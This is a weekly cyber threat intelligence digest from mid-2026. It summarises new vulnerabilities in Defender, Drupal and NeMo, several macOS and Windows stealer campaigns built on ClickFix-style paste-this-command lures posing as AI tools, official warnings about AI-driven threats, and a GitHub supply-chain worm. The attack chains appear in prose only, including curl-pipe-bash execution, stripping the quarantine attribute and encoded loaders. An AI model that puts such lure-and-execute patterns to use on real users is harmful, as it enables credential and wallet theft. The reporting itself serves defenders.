Cyber Threat Intelligence Digest: Week 25

Executive Summary -
Highlights of Cyber Threat Intelligence Digest

Vulnerabilities

Microsoft Discloses RoguePlanet Zero-Day CVE-2026-50656 Vulnerability in Microsoft Defender - On 16th June 2026, Microsoft published an advisory for CVE-2026-50656, an elevation-of-privilege vulnerability dubbed "RoguePlanet" affecting the Microsoft Malware Protection Engine used by Microsoft Defender. At the time of writing, Microsoft classified the vulnerability as publicly disclosed but not yet exploited in the wild. Security researcher Nightmare Eclipse publicly disclosed the vulnerability and released proof-of-concept (PoC) code.

Microsoft Defender hardening updates released in May 2026 mitigated earlier exploitation paths that could have enabled remote code execution; however, the published RoguePlanet PoC bypasses those mitigations and achieves SYSTEM-level privileges on Windows 10 and Windows 11 systems running the June 2026 security updates. Notably, the PoC functions regardless of whether Microsoft Defender real-time protection is enabled or disabled, and may also be effective when Defender is operating in passive mode.

Drupal Patches Critical Vulnerability CVE-2026-55803 in Drupal Core - On 17th June 2026, Drupal patched and disclosed details of CVE-2026-55803, a critical PHP object injection vulnerability in Drupal Core affecting versions prior to 10.5.12, 10.6.10, 11.2.0-11.2.13, and 11.3.0-11.3.11. The flaw stems from incomplete protection for the entity reference field, which stores serialised data via the JSON:API, and successful exploitation would allow threat actors to inject a malicious payload.

Drupal addressed the vulnerability in versions 11.3.12, 11.2.14, 10.6.11, and 10.5.12. Organisations running affected versions of Drupal Core are advised to apply the relevant patches promptly, given the critical severity rating and the potential for remote exploitation via a commonly used API interface.

NVIDIA Patches CVE-2026-24155, CVE-2026-24252, and CVE-2026-24228 in NeMo Framework - On 16th June 2026, NVIDIA patched three vulnerabilities affecting NVIDIA NeMo versions through 2.7.2, with fixes delivered in NeMo version 2.7.3. At the time of writing, there are no known instances of active exploitation. The three vulnerabilities are CVE-2026-24155, a code injection flaw; CVE-2026-24252, an OS command injection flaw; and CVE-2026-24228, a deserialisaton vulnerability.

If exploited, all three vulnerabilities share a common impact profile, enabling threat actors to execute arbitrary code, escalate privileges, disclose sensitive information, and tamper with data. CVE-2026-24252 additionally permits the execution of arbitrary operating system commands. Organisations utilising affected versions of NVIDIA NeMo are advised to upgrade to version 2.7.3 promptly.

Potential Threats

Threat Actor Uses Claude and ChatGPT GitHub Repositories To Deploy Nova Stealer Via Malicious Copy-and-Paste Execution - On 17th June 2026, Jamf Threat Labs reported on a campaign using the lure of free artificial intelligence access to deliver Nova Stealer, a macOS information stealer. The threat actor operated a GitHub account named Tributarytushift to publish fake "free Claude" and "ChatGPT trial" repositories, whose README files instructed victims to paste a curl pipe bash one-liner into Terminal — a technique Jamf Threat Labs described as a ClickFix-style variation of the older drag-to-Terminal method.

The command downloads an unsigned Nova Stealer payload from further repositories published by the same Tributarytushift account, runs xattr -c to strip the macOS quarantine attribute from the payload, and subsequently executes it. macOS users should be cautious of any repository or online resource offering free access to commercial AI tools, particularly those instructing users to run terminal commands directly.

Threat Actors Use ErrTraffic ClickFix Framework to Distribute Information Stealers and Malware Through Compromised WordPress Websites and AI-Themed Lures - On 16th June 2026, cybersecurity firm Sekoia published a report detailing ErrTraffic, a malware-as-a-service traffic distribution framework that injects malicious JavaScript into compromised websites and employs ClickFix lures to trick victims into executing malware. ErrTraffic leverages the EtherHiding technique to retrieve its command-and-control infrastructure from Polygon blockchain smart contracts, enabling threat actors to rotate infrastructure whilst distributing malware through compromised WordPress sites and dedicated lure pages. Sekoia identified two distinct clusters, named Analytics and Beer, linked to campaigns delivering payloads including Vidar, DanaBot, HijackLoader, Stealc, and SmokeLoader.

Sekoia identified three campaigns utilising the framework. The Analytics and Bintang campaigns both used stolen WordPress administrator credentials to deploy backdoors and ClickFix lures, ultimately delivering Vidar Stealer to victims; Sekoia attributed the Bintang campaign to a distinct affiliate likely based in South-East Asia. A separate series of AI platform impersonation campaigns used fake websites mimicking Google Antigravity and ChatGPT to target developers and cryptocurrency users with themed ClickFix lures, delivering DanaBot and HijackLoader respectively, likely promoted via malvertising.

Threat Actors Abuse Claude.ai Shared Chat Feature to Deliver MacSync Stealer Through ClickFix Malvertising Campaign - On 17th June 2026, TrendAI Research published a technical analysis of a malvertising campaign delivering MacSync Stealer, a macOS information stealer active since at least 2025 that targets credentials, browser data, and cryptocurrency wallet information. The campaign abused Google Ads and the claude.ai shared chat feature, which allows users to generate publicly viewable conversation URLs, to distribute ClickFix lures. Targeting victims searching for AI development tools, the threat actors impersonated brands including Claude AI, ChatGPT Codex, Perplexity AI, Cursor IDE, and JetBrains. Between 8th April and 14th June 2026, they deployed over 100 malicious hostnames across multiple attack waves, initially abusing GitLab Pages before shifting on 6th May to claude.ai shared chat URLs, thereby reducing the effectiveness of domain reputation and URL-based detection mechanisms.

The infection chain began with victims clicking sponsored Google Ads that redirected them to pages impersonating Apple Support or the Corda Team, instructing them to open Terminal and execute a supplied command. That command decoded a Base64-encoded blob to retrieve and execute a loader script, which in turn downloaded a Zsh script containing a further encoded payload. Before proceeding, the script checked for a Russian keyboard layout; if detected, execution terminated. On systems without this layout, MacSync Stealer was deployed, collecting browser credentials, session cookies, SSH keys, and cryptocurrency wallet files before exfiltrating the data to threat actor-controlled infrastructure.

General News

Five Eyes agencies sound alarm about AI’s threat to cybersecurity - The Five Eyes intelligence alliance issued a warning that rapidly evolving AI represents an urgent cybersecurity threat requiring immediate action from business leaders. The alliance cautioned that frontier AI models will likely exceed current industry expectations, fundamentally transforming offensive and defensive cyber capabilities within months rather than years. AI lowers barriers for malicious actors, increases attack speed and complexity, and is shrinking the window between vulnerability discovery and exploitation. Whilst acknowledging AI's potential to strengthen defences, the alliance stressed that cyber resilience must function under pressure, and that having controls in place alone is insufficient.

The announcement set out concrete recommendations for organisational leaders. Attack surfaces should be reduced by limiting unnecessary system access and external connectivity, and patching must be accelerated given AI-assisted exploitation timelines. Legacy systems were described as strategic liabilities rather than mere technical debt. Access controls should be tightened, critical system access restricted to as few individuals as possible, and robust authentication enforced. Leaders were urged to fund and empower internal security teams, embed foundational cybersecurity practices, and adopt secure-by-design principles as standard. The alliance also cautioned against over-reliance on any single solution, reaffirming that defence in depth remains essential.

Hostile states behind three-quarters of attacks on Britain's critical infrastructure - Richard Horne, chief executive of the National Cyber Security Centre (NCSC), warned on Wednesday that Britain is already fighting the opening exchanges of future conflicts in cyberspace, disclosing that hostile states are responsible for approximately three-quarters of attacks striking the country's critical national infrastructure. Delivering the annual security lecture at the Royal United Services Institute, Horne revealed his teams had handled more than 200 incidents affecting critical infrastructure in the year to May, regularly finding and stopping breaches before their intent became clear. He warned that adversaries were "prepositioning" throughout British critical infrastructure — establishing footholds to enable rapid exploitation and mass disruption in a time of conflict — citing the Chinese state-linked Volt Typhoon campaign against US infrastructure as the clearest example of the tactic.

Horne's speech notably reframed the language of cybersecurity, arguing the issue should no longer be treated as a "risk" to be managed but as a "contest" to be fought, placing the NCSC's vocabulary in step with NATO's position that cyberspace is "contested at all times." He cautioned that benchmarking defences against industry rivals was inadequate, stating that the only meaningful benchmark is how capability compares against that of an opponent. A new NCSC assessment judged it highly likely that by 2028 AI tools would be used to exploit known weaknesses in ageing critical infrastructure. Horne's remarks coincide with the government's progression of the Cyber Security and Resilience Bill through Parliament and plans to publish a new National Cyber Action Plan in early July.

GitHub dismissed security reports on flaws now exploited by supply-chain worm - GitHub rejected two formal vulnerability reports from threat intelligence group Deep Specter Research identifying design flaws enabling variants of the Shai-Hulud supply-chain worm to compromise hundreds of software packages and developer accounts worldwide. Both reports, submitted via GitHub's HackerOne channel, were closed as ineligible. Originating with the TeamPCP cybercrime group, copycat variants have emerged since early May and have been linked to breaches at the European Commission, AI recruiting firm Mercor, the LiteLLM package, GitHub, and Red Hat. Deep Specter confirmed 516 malicious packages live across five ecosystems including npm, PyPI, and RubyGems, with over 3,000 affected repositories and 200 compromised developer accounts — figures described as a floor, as GitHub's code search cannot index the worm's primary payload due to file size thresholds.

The two rejected reports concerned commit timestamp manipulation and author identity spoofing. The worm backdates malicious commits to resemble routine historical edits and forges author metadata to impersonate trusted engineers. GitHub responded that both behaviours are properties of the underlying git system rather than platform vulnerabilities, directing researchers to GPG and SSH commit signing and opt-in Vigilant Mode as mitigations. Crucially, GitHub's Events API records which account actually pushed each commit, data that cannot be forged, but this is not displayed on the commit page visible to reviewers and expires from public view after approximately 90 days. As of 16th June, 1,729 credential-harvesting repositories and 151 repositories serving active malicious payloads remained live on the platform.

Threat Actor Weekly Graph

Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.

Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.

Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.

Both intent and opportunity are scored out of 100 and are responsible for scoring the group's severity. These updates can be seen below.